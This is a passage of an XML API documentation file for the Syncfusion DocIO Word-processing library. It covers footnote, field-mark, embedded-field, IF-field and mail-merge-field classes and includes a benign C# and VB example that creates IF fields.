            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WEmbedField.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WEmbedField.CloneImpl">
            <summary>
            Clone values of all fields of current embedded field
            </summary>
            <returns>
            new WEmbedField, containing the same info as in current
            </returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WEmbedField.EntityType">
            <summary>
            Gets the type of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WEmbedField.StoragePicLocation">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WEmbedField.IsOle2">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WControlField">
            <summary>
            Represents form control field.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WControlField.m_storagePicLocation">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WControlField.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WControlField"/> class.
            </summary>
            <param name="doc"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WControlField.CloneImpl">
            <summary>
            Clone values of all fields of current embedded field
            <exclude/>
            </summary>
            <returns>
            new WEmbedField, containing the same info as in current
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WControlField.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            Clones the relations
            </summary>
            <param name="doc">Document</param>
            <param name="nextOwner">Owner of the entity</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WControlField.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WControlField.EntityType">
            <summary>
            Gets the type of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WControlField.StoragePicLocation">
            <summary>
            Gets or sets the storage location.
            </summary>
            <value>The storage pic location.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WControlField.OleObject">
            <summary>
            Gets the OLE object.
            </summary>
            <value>The OLE object.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WFieldMark">
            <summary>
            Represents the field mark in the document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WFieldMark.m_fldMarkType">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFieldMark.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WFieldMark"/> class.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFieldMark.#ctor(Syncfusion.DocIO.DLS.WFieldMark,Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WFieldMark"/> class.
            </summary>
            <param name="fieldMark">The field mark.</param>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFieldMark.#ctor(Syncfusion.DocIO.DLS.IWordDocument,Syncfusion.DocIO.DLS.FieldMarkType)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WFieldMark"/> class.
            </summary>
            <param name="doc">The doc.</param>
            <param name="type">The type.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFieldMark.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFieldMark.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFieldMark.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFieldMark.CreateLayoutInfo">
            <summary>
            <exclude/>
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WFieldMark.EntityType">
            <summary>
            Gets the type of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WFieldMark.CharacterFormat">
            <summary>
            Gets character format of the field mark.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WFieldMark.Type">
            <summary>
            Gets or sets type of field mark.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WFieldMark.ParentField">
            <summary>
            Gets or sets the parent field.
            </summary>
            <value>
            The parent field.
            </value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WFootnote">
            <summary>
            Represents a document footnote or endnote.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WFootnote.m_footnoteType">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WFootnote.m_textBody">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WFootnote.m_symbolCode">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WFootnote.m_strSymbolFontName">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WFootnote.m_strCustomMarker">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WFootnote.m_changesCount">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFootnote.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WFootnote"/> class.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFootnote.#ctor(Syncfusion.DocIO.DLS.IWordDocument,System.String)">
            <summary>
            
            </summary>
            <param name="doc"></param>
            <param name="marker"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFootnote.AddSelf">
            <summary>
            Adds the self.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFootnote.CreateLayoutInfo">
            <summary>
            Creates the layout info.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFootnote.CloneImpl">
            <summary>
            Clones the specified paragraph.
            <exclude/>
            </summary>
            <returns>Returns cloned object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFootnote.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            Clones the relations.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFootnote.OnStateChange(System.Object)">
            <summary>
            "Listener" for state change.
            </summary>
            <param name="sender"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFootnote.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFootnote.InitXDLSHolder">
            <summary>
            Initialize the XDLS holder.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFootnote.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFootnote.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFootnote.UpdateAutoMarker(System.Boolean)">
            <summary>
            
            </summary>
            <param name="isAutoNumbered"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFootnote.UpdateCustomMarker(System.String,System.String)">
            <summary>
            Updates the custom marker.
            </summary>
            <param name="destMarker">The destination marker.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFootnote.UpdateSymbolMarker(System.Byte)">
            <summary>
            
            </summary>
            <param name="symbol"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFootnote.ClearPreviousCustomMarker">
             <summary>
            Clearing the previous
             </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFootnote.GetCustomMarker">
             <summary>
            Getting the CustomMarker string
             </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFootnote.CompareCharacterFormat(Syncfusion.DocIO.DLS.WCharacterFormat)">
             <summary>
            Compare CharacterFormat
             </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFootnote.CompareBorderProperty(Syncfusion.DocIO.DLS.Border)">
             <summary>
            Checks the character style.
             </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFootnote.UpdateFtnMarker(System.String,System.String)">
            <summary>
            Updates the footnote marker.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFootnote.EnsureFtnMarker">
            <summary>
            Ensures the footnote/endnote marker.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFootnote.AppendFtnSymbol">
            <summary>
            Appends the footnote symbol.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFootnote.GenerateSymbol(System.Byte)">
            <summary>
            Generates the symbol.
            </summary>
            <param name="symbolCode">The symbol code.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFootnote.ReplaceSelection(Syncfusion.DocIO.DLS.WTextRange,Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.TextSelection)">
            <summary>
            Replaces the selection.
            </summary>
            <param name="symbol">The symbol.</param>
            <param name="para">The paragraph.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFootnote.EnsureFtnStyle">
            <summary>
            Ensures the footnote/endnote style.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFootnote.UpdateChangeFlag(System.Boolean)">
            <summary>
            Updates the change flag.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFootnote.ReplaceMarker(Syncfusion.DocIO.DLS.TextSelection,System.String)">
            <summary>
            Replaces the marker.
            </summary>
            <param name="selection">The selection.</param>
            <param name="replaceText">The replace text.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFootnote.AppendMarker(System.String,Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Appends the marker.
            </summary>
            <param name="marker">The marker.</param>
            <param name="para">The destination paragraph.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFootnote.GenerateText(System.String)">
            <summary>
            Generates the text.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFootnote.Syncfusion#Layouting#ILeafWidget#Measure(Syncfusion.DocIO.Rendering.DrawingContext)">
            <summary>
            Measures self size.
            </summary>
            <param name="graphics"></param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WFootnote.EntityType">
            <summary>
            Gets the type of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WFootnote.FootnoteType">
            <summary>
            Gets / sets footnote type: footnote or endnote
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WFootnote.IsAutoNumbered">
            <summary>
            Gets the value indicating if the footnote is auto numbered
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WFootnote.TextBody">
            <summary>
            Gets the text body of the footnote.
            </summary>
            <value>The text body.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WFootnote.MarkerCharacterFormat">
            <summary>
            Gets the marker character format
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WFootnote.SymbolCode">
            <summary>
            Gets or sets the marker symbol code.
            </summary>
            <value>The symbol code.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WFootnote.SymbolFontName">
            <summary>
            Gets or sets the name of the marker symbol font.
            </summary>
            <value>The name of the symbol font.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WFootnote.CustomMarker">
            <summary>
            Gets or sets the custom footnote marker.
            </summary>
            <value>The custom marker.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WFootnote.CustomMarkerIsSymbol">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WFootnote.IsLayouted">
            <summary>
            indicate whether the endnote instance layouted or not. 
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.LayoutFootnoteInfoImpl">
            <summary>
            The class specifies the Layout Footnote information.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.FootnoteLayoutInfo.m_footnoteID">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.FootnoteLayoutInfo.m_textRange">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.FootnoteLayoutInfo.m_height">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.FootnoteLayoutInfo.m_endnoteheight">
            <summary>
            Holds the height of the footnote
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.FootnoteLayoutInfo.#ctor(Syncfusion.Layouting.ChildrenLayoutDirection)">
            <summary>
            Initializes a new instance of the <see cref="!:LayoutParagraphInfo"/> class.
            </summary>
            <param name="childLayoutDirection">The child layout direction.</param>
        </member>
        <!-- Badly formed XML comment ignored for member "M:Syncfusion.Layouting.FootnoteLayoutInfo.GetFootnoteID(Syncfusion.DocIO.DLS.WFootnote,System.Int32)" -->
        <member name="M:Syncfusion.Layouting.FootnoteLayoutInfo.GetBaseEntity(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Get Base Entity.
            </summary>
            <param name="entity">The entity.</param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.Layouting.FootnoteLayoutInfo.FootnoteHeight">
            <summary>
            Get/Set Footnote/Endnote TextBody  height
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.FootnoteLayoutInfo.Endnoteheight">
            <summary>
            Get/Set Endnote TextBody  height
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.FootnoteLayoutInfo.FootnoteID">
            <summary>
            Get/Set Footnote/Endnote ID.
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.FootnoteLayoutInfo.TextRange">
            <summary>
            Get/Set the TextRange 
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WIfField">
            <summary>
            Represents the IF field in the document.
            </summary>
            <example>
            <para>The following code example demonstrates how to add an If field in Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument();
                IWSection section = document.AddSection();
                IWParagraph paragraph = section.AddParagraph();
                paragraph.AppendText("If field which uses string of characters in expression");
                paragraph = section.AddParagraph();
                //Create the new instance of IF field
                WIfField field = paragraph.AppendField("If", FieldType.FieldIf) as WIfField;
                //Specify the expression, true and false statement in field code
                field.FieldCode = "IF \"True\" = \"True\" \"The given statement is Correct\" \"The given statement is Wrong\"";
                paragraph = section.AddParagraph();
                paragraph.AppendText("If field which uses numbers in expression");
                paragraph = section.AddParagraph();
                //Create the new instance of IF field
                field = paragraph.AppendField("If", FieldType.FieldIf) as WIfField;
                //Specify the expression, true and false statement in field code
                field.FieldCode = "IF 100 >= 1000 \"The given statement is Correct\" \"The given statement is Wrong\"";
                //Update the document fields
                document.UpdateDocumentFields();
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument()
                Dim section As IWSection = document.AddSection()
                Dim paragraph As IWParagraph = section.AddParagraph()
                paragraph.AppendText("If field which uses string of characters in expression")
                paragraph = section.AddParagraph()
                'Create the new instance of IF field
                Dim field As WIfField = TryCast(paragraph.AppendField("If", FieldType.FieldIf), WIfField)
                'Specify the expression, true and false statement in field code
                field.FieldCode = "IF ""True"" = ""True"" ""The given statement is Correct"" ""The given statement is Wrong"""
                paragraph = section.AddParagraph()
                paragraph.AppendText("If field which uses numbers in expression")
                paragraph = section.AddParagraph()
                'Create the new instance of IF field
                field = TryCast(paragraph.AppendField("If", FieldType.FieldIf), WIfField)
                'Specify the expression, true and false statement in field code
                field.FieldCode = "IF 100 >= 1000 ""The given statement is Correct"" ""The given statement is Wrong"""
                'Update the document fields
                document.UpdateDocumentFields()
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WIfField.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WIfField"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WIfField.UpdateIfField">
            <summary>
            Updates if field.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WIfField.GetEntityText(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Gets the text in the entity
            </summary>
            <param name="entity">The entity.</param>
            <returns>Entity text</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WIfField.ConvertFieldResultToString(System.Collections.Generic.List{Syncfusion.DocIO.DLS.Entity})">
            <summary>
            Gets the Field Result as String
            </summary>
            <param name="fieldResult">List of entity.</param>
            <returns>Field Result as string</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WIfField.UpdateIfFieldResult(System.Boolean)">
            <summary>
            Updates the field result entities between FieldSeparator and FieldEnd.
            </summary>
            <param name="result">The result.</param>       
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WIfField.InitLayoutInfoOfTextBodyItem(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Initializes the layout information of text body item.
            </summary>
            <param name="entity">The entity.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WIfField.UpdateIfFieldResult(System.Collections.Generic.List{Syncfusion.DocIO.DLS.Entity})">
            <summary>
            Updates the field result entities between FieldSeparator and FieldEnd.
            </summary>
            <param name="fieldResult">List of field result entities.</param>       
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WIfField.MergeFieldSeparatorAndFieldEndParagraph">
            <summary>
            Merges the field separator and field end paragraph.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WIfField.MergeFieldSeparatorAndFieldEndParagraph(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Merges the field separator and field end paragraph.
            </summary>
            <param name="para">The para.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WIfField.ParseResult">
            <summary>
            Parse the Field range to  get expression and Results
            </summary>        
            <returns>expression text</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WIfField.GetUpdatedRange">
            <summary>
            Gets the updated cloned field Range
            </summary>        
            <returns>List of cloned Entity</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WIfField.GetClonedFieldItem(Syncfusion.DocIO.DLS.Entity,System.Collections.Generic.List{Syncfusion.DocIO.DLS.Entity}@)">
            <summary>
            Gets the cloned Field entiy
            </summary>
            <param name="entity">The entity.</param>
            <param name="entityList">The entity list.</param>        
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WIfField.GetClonedParagraphItem(Syncfusion.DocIO.DLS.Entity,System.Collections.Generic.List{Syncfusion.DocIO.DLS.Entity}@)">
            <summary>
            Gets the cloned paragraph item
            </summary>
            <param name="entity">The entity.</param>
            <param name="entityList">The entity list.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WIfField.SplitEntity(Syncfusion.DocIO.DLS.Entity,System.String)">
             <summary>
            Splits Entity
             </summary>
             <param name="entity">The entity.</param>
             <param name="remaining">The remaining text.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WIfField.ReadExpression(System.String@,Syncfusion.DocIO.DLS.Entity@,System.Boolean@,System.Boolean@)">
            <summary>
            Reads the expression from range
            </summary>
            <param name="expressionText">The entity.</param>
            <param name="readTrueText">Reference to readTrueText flag.</param>
            <param name="expressionFound">Reference to expressionFound flag</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WIfField.ReachedEndOfExpression(System.String@)">
            <summary>
            Checks the text reached end of expression.
            </summary>
            <param name="text">The text.Text after the expression remains in the text if expression found</param>       
            <returns>"true" if the text reached end of expression otherwise false</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WIfField.ContainsOperator(System.String@)">
            <summary>
            Checks the text contains operator or not.
            </summary>
            <param name="text">The text.Text after the operator remains in the text if operator found</param>
            <returns>"true" if the text conatins operator otherwise false</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WIfField.ReadTrueResult(System.String@,Syncfusion.DocIO.DLS.Entity@,System.Boolean@,System.Boolean@)">
            <summary>
            Reads the True result entity
            </summary>
            <param name="text">The text.</param>
            <param name="entity">The entity.</param>
            <param name="readTrueText">Reference to readTrueText flag.</param>
            <param name="expressionFound">Reference to expressionFound flag</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WIfField.ReadFalseResult(System.String@,Syncfusion.DocIO.DLS.Entity@,System.Boolean@,System.Boolean@,System.Boolean@)">
            <summary>
            Reads the False result entity
            </summary>        
            <param name="entity">The entity.</param>        
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WIfField.TrimFieldResults(System.Collections.Generic.List{Syncfusion.DocIO.DLS.Entity})">
            <summary>
            Removes the unwanted text/entity in the Result
            </summary>
            <param name="fieldResult">The field result.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WIfField.TrimDoubleQuotes(System.Collections.Generic.List{Syncfusion.DocIO.DLS.Entity})">
            <summary>
            Trim Double Quotes
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WIfField.TrimDoubleQuotesinTextRange(Syncfusion.DocIO.DLS.WTextRange@,System.Boolean@,System.Boolean@)">
            <summary>
            Trims the double quotesin text range.
            </summary>
            <param name="textRange">The text range.</param>
            <param name="isStart">if set to <c>true</c> [is start].</param>
            <param name="isEnd">if set to <c>true</c> [is end].</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WIfField.GetIndexOfDoubleQuote(System.String)">
            <summary>
            Get Index of Double quote character
            </summary>
            <param name="text"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WIfField.CheckIfField(Syncfusion.DocIO.DLS.WParagraph@,System.String@,System.Boolean@)">
            <summary>
            Checks if field.
            </summary>
            <param name="para">The para.</param>
            <param name="text">The text.</param>
            <param name="isIfFieldResult">if set to <c>true</c> [is if field result].</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WIfField.CheckIfFieldEnd(Syncfusion.DocIO.DLS.WParagraph@,System.Boolean@)">
            <summary>
            Checks if field end.
            </summary>
            <param name="para">The para.</param>
            <param name="isIfFieldResult">if set to <c>true</c> [is if field result].</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WIfField.ParseFieldCode(System.String)">
            <summary>
            
            </summary>
            <param name="fieldCode"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WIfField.UpdateFieldCode(System.String)">
            <summary>
            Updates field code
            </summary>
            <param name="fieldCode"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WIfField.CheckExpStrings">
            <summary>
            Checks the expression strings.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WIfField.ParseFieldValue">
            <summary>
            Parses the field value.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WIfField.UpdateExpString">
            <summary>
            Updates the expression string.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WIfField.UpdateMergeFields">
            <summary>
            Updates the merge fields.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WIfField.CloneImpl">
            <summary>
            Clones itself.
            <exclude/>
            </summary>
            <returns>Returns cloned object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WIfField.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WIfField.Expression1">
            <summary>
            Gets the Expression1 of IF field.
            </summary>
            <value>The expression1.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WIfField.Expression2">
            <summary>
            Gets the Expression2 of IF field.
            </summary>
            <value>The expression1.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WIfField.TrueTextField">
            <summary>
            Gets the TrueText field.
            </summary>
            <value>The true text field.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WIfField.FalseTextField">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WIfField.MergeFields">
            <summary>
            Gets the merge fields.
            </summary>
            <value>The merge fields.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.PseudoMergeField">
            <summary>
            Class represents pseudo merge field inside IF field
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PseudoMergeField.m_fitMailMerge">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PseudoMergeField.#ctor(System.String)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.PseudoMergeField"/> class.
            </summary>
            <param name="fieldText">The field text.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.PseudoMergeField.Name">
            <summary>
            Gets the name.
            </summary>
            <value>The name.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.PseudoMergeField.Value">
            <summary>
            Gets or sets the value.
            </summary>
            <value>The value.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.PseudoMergeField.FitMailMerge">
            <summary>
            Gets a value indicating whether fit mail merge.
            </summary>
            <value>if it fits the mail merge, set to <c>true</c>.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WMergeField">
            <summary>
            Represents the mail merge field in the document.
            </summary>    
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WMergeField.m_fieldName">
            <summary>
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WMergeField.m_textBefore">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WMergeField.m_textAfter">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WMergeField.m_prefix">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WMergeField.m_numberFormat">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WMergeField.m_dateFormat">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WMergeField.m_pItemColl">
            <summary>
            The collection of text ranges which form field value
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WMergeField.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WMergeField"/> class with specified <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.
            </summary>
            <param name="doc">The word document instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WMergeField.CloneImpl">
            <summary>
            Clones itself.
            <exclude/>
            </summary>
            <returns>Returns cloned object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WMergeField.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            Clones the relations.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WMergeField.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WMergeField.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WMergeField.ParseFieldCode(System.String)">
            <summary>
            </summary>
            <param name="fieldCode"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WMergeField.GetFieldValues(System.String)">
            <summary>
            Get Field Values - Parse for Field name and field switches
            </summary>
